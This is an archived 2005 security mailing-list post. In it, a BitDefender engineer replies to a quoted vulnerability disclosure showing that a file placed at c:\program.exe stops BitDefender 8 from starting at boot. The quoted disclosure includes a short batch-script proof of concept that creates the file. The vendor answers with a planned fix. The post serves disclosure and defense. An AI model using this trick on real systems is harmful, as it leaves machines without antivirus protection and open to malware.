Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: BitDefender 8 - Race condition vulnerability

from [Ovidiu Constantin] Network Security [Permanent Link]
Subject: Re: BitDefender 8 - Race condition vulnerability
Date: Mon, 25 Apr 2005 17:47:16 +0300 
În data de Sî, 23-04-2005 la 03:03 +0000, SecuBox fRoGGz a scris:


-----------------------------
Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------

BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data 
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: www.bitdefender.com


VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Maybe other...


RACE CONDITION
--------------
At Windows startup, when a file named: program.exe is found on c:\ 
Windows send an alert message, messagebox controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup. 
(Sorry, haven't got the exact english message)

At this moment, BitDefender can't start, so we have a session without virus 
protection.


PROOF OF CONCEPT
----------------
Open your notepad.exe and paste this batch script.

@echo off
echo #-------------------------------------------------------#
echo [   SecuBox - Proof of Concept        (04.12.2005)      ]
echo #-------------------------------------------------------#
echo # This script just create the race condition.           #
echo # It might be use by virus.                             #
echo # Now, reboot your computer and watch your BitDef !     #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient !      #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit


EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.


VENDOR STATUS
-------------
Vendor have been contacted but no reply ...


CREDITS
----------------------
SecuBox Labs - fRoGGz
unsecure@writeme.com
----------------------



Thanks for informing us about this issue. Now we are aware of it and in
short time all BitDefender installation kits will be updated in order
to fix it. The quick fix is to put all the start up commands between "
".

We will keep you posted.

-- 
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
http://linux.bitdefender.com/

Attachment: signature.asc
Description: This is a digitally signed message part


-- 
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://linux.bitdefender.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  remote command execution in text.cgi script, fireboy fireboy
Next by Date:  index.cgi script XSS + file show, fireboy fireboy
Previous by Thread:  BitDefender 8 - Race condition vulnerability, SecuBox fRoGGz
Next by Thread:  FreeBSD Security Advisory FreeBSD-SA-05:05.cvs, FreeBSD Security Advisories
Indexes:  [Date] [Thread] [Top] [All Lists]